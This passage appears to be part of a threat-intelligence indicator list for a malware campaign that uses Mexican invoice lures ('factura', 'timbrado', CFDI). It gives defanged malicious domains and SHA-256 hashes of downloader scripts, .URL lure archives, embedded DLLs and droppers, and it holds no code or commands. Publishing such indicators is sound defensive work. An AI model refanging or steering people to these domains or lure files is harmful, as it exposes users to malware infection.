comprobante75[.]meinastrohoroskop[.]com
comprobante80[.]serragrandreunion[.]com
comprobante91[.]servicioslocomer[.]online
comprobante93[.]venagard[.]com
cumplimiento19[.]altavista100[.]com
cumplimiento35[.]solucionegos[.]top
cumplimiento39[.]meinastrohoroskop[.]com
cumplimiento43[.]commerxion[.]buzz
cumplimiento47[.]solucionegos[.]top
cumplimiento48[.]callarlene[.]net
cumplimiento56[.]timbradoelectronico[.]com
cumplimiento72[.]serragrandreunion[.]com
cumplimiento81[.]paulfenelon[.]com
cumplimiento91[.]miramantolama[.]com
cumplimiento94[.]meinastrohoroskop[.]com
cumplimiento98[.]serragrandreunion[.]com
factura10[.]miramantolama[.]com
factura20[.]facturascorporativas[.]com
factura20[.]solunline[.]top
factura34[.]changjiangys[.]net
factura4[.]servicioslocomer[.]online
factura40[.]miramantolama[.]com
factura44[.]servicioslocales[.]online
factura46[.]facturasfiel[.]com
factura49[.]marcialledo[.]com
factura50[.]callarlene[.]net
factura59[.]altavista100[.]com
factura7[.]taoshome4sale[.]com
factura71[.]servicioslomex[.]online
factura72[.]serragrandreunion[.]com
factura73[.]mariageorgina[.]com
factura81[.]altavista100[.]com
factura90[.]changjiangys[.]net
factura91[.]servicioslocomer[.]online
folio24[.]serragrandreunion[.]com
folio24[.]spacefordailyrituals[.]com
folio47[.]marcialledo[.]com
folio53[.]mariageorgina[.]com
folio60[.]callarlene[.]net
folio75[.]taoshome4sale[.]com
folio75[.]venagard[.]com
folio76[.]miramantolama[.]com
folio83[.]altavista100[.]com
folio89[.]changjiangys[.]net
folio90[.]servicioslocomer[.]online
folio99[.]solunline[.]top
pdf21[.]changjiangys[.]net
pdf33[.]venagard[.]com
pdf34[.]solucionpiens[.]top
pdf39[.]facturasonlinemx[.]com
pdf43[.]marcialledo[.]com
pdf49[.]marcialledo[.]com
pdf50[.]changjiangys[.]net
pdf57[.]visual8298[.]top
pdf59[.]venagard[.]com
pdf63[.]paulfenelon[.]com
pdf65[.]verificatutramite[.]com
pdf70[.]mariageorgina[.]com
pdf81[.]photographyride[.]com
pdf85[.]miramantolama[.]com
pdf93[.]venagard[.]com
pdf98[.]solunline[.]top
portal27[.]marcialledo[.]com
portal34[.]solunline[.]top
portal48[.]solucionpiens[.]top
portal50[.]solucionegos[.]top
portal55[.]solucionegos[.]top
portal63[.]paulfenelon[.]com
portal70[.]solunline[.]top
portal80[.]changjiangys[.]net
portal86[.]serragrandreunion[.]com
portal90[.]meinastrohoroskop[.]com
portal92[.]solucionpiens[.]top
suscripcion0[.]venagard[.]com
suscripcion10[.]solunline[.]xyz
suscripcion24[.]facturasonlinemx[.]com
suscripcion24[.]venagard[.]com
suscripcion32[.]servicioslocomer[.]online
suscripcion38[.]eagleservice[.]buzz
suscripcion38[.]mariageorgina[.]com
suscripcion57[.]changjiangys[.]net
suscripcion65[.]g1ooseradas[.]buzz
suscripcion84[.]taoshome4sale[.]com
suscripcion95[.]servicioslomex[.]online
timbrado0[.]meinastrohoroskop[.]com
timbrado11[.]verificatutramite[.]com
timbrado16[.]taoshome4sale[.]com
timbrado17[.]marcialledo[.]com
timbrado17[.]mariageorgina[.]com
timbrado2[.]serviciosna[.]top
timbrado2[.]solucionegos[.]top
timbrado33[.]meinastrohoroskop[.]com
timbrado42[.]mariageorgina[.]com
timbrado54[.]changjiangys[.]net
timbrado6[.]meinastrohoroskop[.]com
timbrado73[.]mariageorgina[.]com
timbrado74[.]callarlene[.]net
timbrado74[.]mexicofacturacion[.]com
timbrado80[.]paulfenelon[.]com
timbrado84[.]miramantolama[.]com
timbrado90[.]porcesososo[.]online
timbrado96[.]paulfenelon[.]com
validacion22[.]hb56[.]cc
JavaScript Files
600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f (Downloader)
883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215 (Region check and redirect)
.URL Files
b1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7 CFDI_930209.zip
e04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f FACTURA_560208.zip
aa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af FAC_560208_ATR890126GK2.url_
66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791 FAC_930209_FME140910KI4.url_
Embedded Binaries
b3f4b207ee83b748f3ae83b90d1536f9c5321a84d9064dc9745683a93e5ec405 Cecujujajofubo475.dll_
e87325f4347f66b21b19cfb21c51fbf99ead6b63e1796fcb57cd2260bd720929 blob.dll_
103d3e03ce4295737ef9b2b9dfef425d93238a09b1eb738ac0e05da0c6c50028 blob.dll_
a579bd30e9ee7984489af95cffb2e8e6877873fd881aa18d7f5a2177d76f7bf2 blob.dll
b01e917dd14c780cb52cafcd14e4dd499c33822c7776d084d29cf5e0bb0bddb6 blob.dll_
795c0b82b37d339ea27014d73ad8f2d28c5066a7ceb6a2aa0d74188df9c311c9 blob.dll_
07521bd6acf725b8a33d1d91fd0cc7830d2cff66abdb24616c2076b63d3f36a8 blob.dll_
71ce48c89b22e99356c464c1541e2d7b9419a2c8fe8f6058914fc58703ba244f blob.dll_
ba7bc4cff098f49d39e16c224e001bd40a5d08048aeec531f771a54ee4a5ecef blob.dll_
Dropper Binaries
010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb
024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762
03cd17df83a7bdf459f16677560e69143d1788ce1fc7927200a09f82859d90ea
075910c802f755d3178a8f1f14ee4cd7924fd4463c7491277bdf2681b16e593c
12bff33da7d9807252bb461d65828154b9b5b1dca505e8173893e3d410d40dd0
1aaa4fb29a88c83495de80893cd2476484af561bb29e8cdfc73ce38f6cd61a84
23b9e4103141d6a898773b1342269334e569bcf576cdcb4a905f24e26320cdab
27c1e41fde9bc0d5027a48ccada1af8c9c8f59937bf5f77edd21e49bd28f29a2
2a225784289f31adbaa8be0b8770495fa8950fce2b7352a0c7a566fc79067547
2a38b75e88f91f9cd28ef478e82c3b44f50e57cb958ba63e58f134d8bd368812
2a3f869e9e78b4d7945a60ceec27586c07bc8b0770be64463358fffe3b6b7395
2e04c36b7ddd6939b7bef258bfeba6f91a5c37a43389dd6d9a88eff5863df5ed
43e99539e4b966dde2f9de8dc1ffb4a22bc560e54c01de9aef6b15fac1412714
46226d4fb7ffe15ba8167e3724f991c543731672e19ef40bb43fddc6df648d0a
46cc07a9287da26e238a74734d87e0aae984f4648a80a26547afa0de8c850afb
51be3a3b4ebd15c305c0f9b57388c449f88f0d6d2d46a0a838f046f0fd21b78f
55b0247b9b574978a4c9abd19c3bcc04ea78598398b9f8aeb35bd51cbd877576
56612bb0ab00cbb7af24326b027a55ff25852ddab1f1c8e24471b7ce97003505
5831f4f8ce715d4a021284e68af1b6d8040a2543484ac84b326eea20c543552e
58562e49c1612f08e56e7d7b3ca6cd78285948018b2998e45bd425b4c79ce1f4
62495620b0d65d94bc3d68dec00ffbe607eacd20ab43dc4471170aa292cc9b1a
682546addb38a938982f0f715b27b4ba5cda4621e63f872f19110d174851c4e9
69019b7b64deb5cc91a58b6a3c5e6b1b6d6665bd40be1381a70690ba2b305790
6bf082f001f914824a6b33f9bdd56d562c081097692221fb887035e80926d583
7923d409959acffab49dda63c7c9c15e1bdd2b5c16f7fcfe8ef3e3108e08df87
7ac22989021082b9a377dcc582812693ce0733e973686b607e8fc2b52dcf181d
8420d77ba61925b03a1ad6c900a528ecacbb2c816b3e6bc62def40fc14e03b78
850dd47a0fb5e8b2b4358bf3aa1abd7ebaae577b6fc4b6b4e3d7533313c845b8
96363b2b9e4ed8044cb90b6619842ba8897b4392f9025cbfdccfda1ea7a14a58
97157c8bbeb8769770c4cb2201638d9ad0103ba2fdfed9bdbd03c53bd7a5fcb9
a103b0c604ef32e7aabb16c2a7917fd123c41486d8e0a4f43dcf6c48d76de425
a82fb82f3aa2f6123d2c0fb954ae558ac6e8862ef756b12136fbe8d533b30573
a92934c014a7859bd122717f4c87f6bd31896cb87d28c9fac1a6af57ff8110f6
ab2a2465fccd7294580c11492c29a943c54415e0c606f41e08ce86d69e254ee4
ababe815e11b762089180e5fb0b1eaffa6a035d630d7aaf1d8060bd5d9a87ea5
b04a0a4a1520c905007a5d370ed2b6c7cb42253f4722cc55a9e475ae9ece1de7
c29b9f79b0a34948bde1dfca3acecca6965795917c7d3444fcacba12f583fb98
c99237a5777a2e8fa7da33460a5b477d155cc26bc2e297a8563516a708323ead
ca652fc3a664a772dbf615abfe5df99d9c35f6a869043cf75736e6492fbd4bea
b5a272acd842154b2069b60aab52568bbfde60e59717190c71e787e336598912
5efa99b3cb17bec76fec2724bcfcc6423d0231bba9cf9c1aed63005e4c3c2875
ce135a7e0410314126cacb2a2dba3d6d4c17d6ee672c57c097816d64eb427735
d3ff98b196717e66213ccf009cbeed32250da0e2c2748d44f4ee8fb4f704407c
35b7dd775db142699228d3e64ee8e9a02c6d91bb49f7c2faf367df8ba2186fd6
e65e25aee5947747f471407a6cce9137695e4fee820f990883b117726195988c
e8ed09b016ea62058404c482edf988f14a87c790d5c9bd3d2e03885b818ef822
febf9c5ede3964fdb3b53307a3d5ef7b0e222705a3bb39bef58e28aaba5eed28
ff3769c95b8a5cdcba750fda5bbbb92ef79177e3de6dc1143186e893e68d45a4